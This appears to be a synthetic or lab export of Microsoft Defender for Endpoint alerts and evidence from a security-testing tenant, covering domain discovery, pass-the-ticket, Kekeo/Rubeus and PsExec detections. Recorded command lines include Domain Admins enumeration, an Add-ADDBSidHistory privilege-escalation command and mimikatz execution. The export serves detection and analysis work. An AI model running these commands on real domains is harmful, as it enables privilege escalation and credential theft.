"processCreationTime": "2022-09-30T06:13:03.9136767Z",
"processId": 8072,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:16:01.5966667Z",
"fileName": "ntoskrnl.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": "2022-09-15T03:19:28.401449Z",
"processId": 4,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "16b6990ada0b0ccee28440afc00f9aa6bdc45f62",
"sha256": "cc9b3a6c057ca31d0886c8efb7965a4c47e2d80fd0185d9b9fa55c5dc1d0dc55",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-19T02:14:07.87Z
|
Suspicious
|
None
|
jeff
|
staging.net
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:10:33.5Z
|
Benign
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-19T02:34:25.7533333Z
|
Suspicious
|
None
|
operator
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:19:24.1733333Z
|
Suspicious
|
None
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1107
|
0808dea1-2ec8-41d2-8e3e-7c18309fab09
|
steve@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-11T08:20:22.8833333Z
|
Suspicious
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 4,704
|
ipconfig
|
2022-11-11T08:16:44.2952776Z
| 4,680
|
2022-11-10T07:07:26.0872385Z
|
explorer.exe
|
C:\Windows
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-12T13:47:46.4766667Z
|
Suspicious
|
None
|
operator
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T04:44:34.51Z
|
Suspicious
|
None
|
Takeshi
|
staging.net
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043450382289041_499189581
|
7fe2225b-b6ae-4a93-a261-13e9dd6d5861
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:10:38.2289225Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:04:12.7195838Z
|
2022-11-18T05:13:20.5030117Z
|
Suspicious Permission Groups Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
Resolved
|
Low
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1069.001",
"T1069.002",
"T1087.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:10:38.28Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:10:38.28Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-18T05:09:25.177958Z",
"processId": 4744,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:10:38.28Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" ",
"processCreationTime": "2022-11-18T05:04:12.7150402Z",
"processId": 4976,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:10:38.4733333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-18T05:09:25.2555067Z",
"processId": 10272,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:14:34.3233333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-11-18T05:13:18.980624Z",
"processId": 9780,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:14:34.4833333Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-11-18T05:13:19.0526991Z",
"processId": 8200,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043439145573052_839616834
|
d8cc3725-deda-48de-bf02-a3f07cab86ed
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T04:51:54.5573234Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T04:42:18.0120246Z
|
2022-11-18T04:48:53.7870169Z
|
Suspicious System Owner/User Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
Resolved
|
Low
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1033",
"T1059.001",
"T1087.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-10-10T06:18:04.255Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Takeshi",
"domainName": "TMTOWER-BOOK"
}
],
"mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"onboardingStatus": "Onboarded",
"osBuild": 22621,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "22H2",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": null,
"deviceId": null,
"domainName": "TMTOWER-BOOK",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T04:51:54.57Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"domainName": null,
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T04:51:54.57Z",
"fileName": "Code.exe",
"filePath": "\\Device\\HarddiskVolume3\\Users\\Takeshi\\AppData\\Local\\Programs\\Microsoft VS Code",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": "2022-11-14T04:36:09.1457881Z",
"processId": 12136,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": "Detected",
"deviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"domainName": "TMTOWER-BOOK",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T04:51:54.57Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-14T04:36:09.1457881Z",
"parentProcessFileName": "Code.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume3\\Users\\Takeshi\\AppData\\Local\\Programs\\Microsoft VS Code",
"parentProcessId": 12136,
"processCommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Import-Module 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules\\PowerShellEditorServices\\PowerShellEditorServices.psd1'; Start-EditorServices -HostName 'Visual Studio Code Host' -HostProfileId 'Microsoft.VSCode' -HostVersion '2022.8.5' -AdditionalModules @('PowerShellEditorServices.VSCode') -BundledModulesPath 'c:\\Users\\Takeshi\\.vscode\\extensions\\ms-vscode.powershell-2022.8.5\\modules' -EnableConsoleRepl -StartupBanner \\\"PowerShell Extension v2022.8.5\nCopyright (c) Microsoft Corporation.\n\nhttps://aka.ms/vscode-powershell\nType 'help' to get help.\n\\\" -LogLevel 'Normal' -LogPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\logs\\1668400572-3c88b720-7963-4dd6-aba1-3456f669fe051668400566006\\EditorServices.log' -SessionDetailsPath 'c:\\Users\\Takeshi\\AppData\\Roaming\\Code\\User\\globalStorage\\ms-vscode.powershell\\sessions\\PSES-VSCode-11004-905307.json' -FeatureFlags @() \"",
"processCreationTime": "2022-11-14T04:36:16.5242809Z",
"processId": 14616,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "9678ea8069d9812cda2a41c9d3dc32d5c4555b7b",
"sha256": "529ee9d30eef7e331b24e66d68205ab4554b6eb3487193d53ed3a840ca7dde5d",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:12:02.97Z
|
Suspicious
|
None
|
ronhd
|
test.domain
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:59:39.6033333Z
|
Malicious
|
None
|
steve
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1107
| null |
steve@msdxv8.m365dpoc.com
|
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 7,052
|
powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\""
|
2022-12-22T08:48:41.0981025Z
| 3,032
|
2022-12-22T08:48:18.0279285Z
|
cmd.exe
|
C:\Windows\System32
|
Detected
|
3ad3fb0567038c2ec2e59e76690c2e6c01253af9
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T13:49:30.22Z
|
Suspicious
|
None
|
operator
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T08:19:39.1366667Z
|
Suspicious
|
None
|
ronhd
|
test.domain
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963602752501_-1659845888
|
c3dcc8f4-55a0-4639-a47d-54119027dd1f
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:59:20.2752831Z
|
2022-12-22T08:59:20.6866667Z
| null |
2022-12-22T08:47:53.119148Z
|
2022-12-22T08:47:53.119148Z
|
Pass-the-ticket attack
|
A .kirbi file, a known file extension for Kerberos tickets containing local authenticated users credentials, was observed being created on the machine. This behavior might be associated with an attacker trying to move laterally in the network using stolen user credentials as part of Pass-The-Tickets” attack
|
CredentialAccess
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
dc47cd98-e905-40ed-ac04-59c4ff6b97ee
| null | null | null |
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:59:20.2933333Z",
"fileName": "ticket.kirbi",
"filePath": "C:\\M365DAttack\\Admin-Tickets",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "c7246f9646d4c96c1400ba1f11ae0d5269f1613e",
"sha256": "26f990a0ee7c4e8d73066661d94a457bc0c39651f9749cb34bc50cfc4e3155f4",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:51:48.8933333Z
|
Suspicious
|
Active
|
Takeshi
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 17,772
|
powershell -enc ZABpAHIA
|
2022-11-18T04:48:53.4490025Z
| 14,616
|
2022-11-14T04:36:16.5242809Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:44:35.99Z
|
Suspicious
|
None
|
svc_acct
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
76866dde54ee3fa5bc8efefb9d44e6bf859973aa
|
afbe51517092256504f797f6a5abc02515a09d603e8c046ae31d7d7855568e91
|
net.exe
|
C:\Windows\System32
| 17,344
|
"net.exe" user /domain
|
2022-11-18T04:38:44.7323003Z
| 14,616
|
2022-11-14T04:36:16.5242809Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T15:56:02.45Z
|
Suspicious
|
None
|
darol
|
lab.net
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045936418350789_1390916301
|
2d68b4d0-1a7c-4a5a-bc6f-ccc173eca203
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:14:01.8350924Z
|
2022-11-21T03:45:17.6166667Z
|
2022-11-21T03:45:17.4759763Z
|
2022-11-21T02:02:38.3423345Z
|
2022-11-21T02:02:38.3423345Z
|
'Kekeo' malware was detected
|
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Malware
|
Resolved
|
Informational
| 50
|
SuccessfullyRemediated
| null | null |
WindowsDefenderAv
|
d60f5b90-ecd8-4d77-8186-a801597ec762
| null | null |
Kekeo
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "test.domain",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:14:01.8833333Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Remediated",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037515790235232_1824808798
|
10261bd8-7812-4b0f-b88e-a03f9c715d41
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:19:39.0235417Z
|
2022-11-12T01:35:43.1766667Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:17:34.3613292Z
|
2022-11-11T08:17:34.3613292Z
|
Suspicious service launched
|
A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device.
|
Execution
|
Resolved
|
Medium
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
a5af9713-6eea-4d23-9bdc-9cab19f19092
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1569.002"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "test.domain",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:19:39.07Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:13:27.8223756Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 632,
